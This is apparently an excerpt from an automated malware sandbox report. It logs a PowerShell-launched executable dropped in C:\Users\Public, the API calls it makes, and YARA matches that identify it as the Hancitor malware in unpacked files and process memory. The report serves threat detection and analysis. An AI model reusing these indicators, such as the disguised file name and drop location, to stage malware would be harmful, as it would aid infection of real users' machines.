Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\Public\snd32sys.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_0062B84D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 16_2_0062B84D
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00657096 _free,_free,_free,GetTimeZoneInformation,_free, 16_2_00657096
Source: C:\Users\Public\snd32sys.exe Code function: 16_2_00611A80 GetVersion,wsprintfA,wsprintfA, 16_2_00611A80

Remote Access Functionality:

Yara detected Hancitor
Source: Yara match File source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY